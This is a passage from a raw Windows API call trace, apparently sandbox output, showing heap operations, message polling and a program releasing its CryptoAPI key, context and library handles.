Size=0x4) returned 0x2e54f58 [0266.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0266.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0266.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e518c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0266.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.890] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0266.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.890] CryptDestroyKey (hKey=0xa870d0) returned 1 [0266.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0266.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0266.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14038 | out: hHeap=0x970000) returned 1 [0266.891] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0266.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0266.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0266.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0266.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.892] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0266.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.892] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0266.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0266.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0266.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0266.892] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0266.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0266.892] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0266.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0266.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.893] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0266.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0266.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0266.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0266.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0266.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0266.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0266.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0266.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0266.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0266.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0266.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0266.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.894] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0266.894] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0266.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0266.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.894] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.894] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0266.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0266.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.894] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0266.895] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0266.895] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0266.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0266.895] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0266.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.895] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0266.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0266.895] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0266.895] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0266.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0266.895] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0266.896] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.896] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.896] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0266.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.896] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.896] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0266.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.896] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0266.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.897] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0266.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.897] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0266.897] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0266.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0266.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.897] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0266.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0266.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0266.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0266.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0266.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0266.898] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0266.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0266.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0266.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.898] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0266.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0266.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a78 [0266.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0266.898] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.898] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.899] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0266.899] FreeLibrary (hLibModule=0x756e0000) returned 1 [0266.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.899] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0266.899] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0266.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.899] CloseHandle (hObject=0x2d0) returned 1 [0266.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0266.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0266.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0266.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0266.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 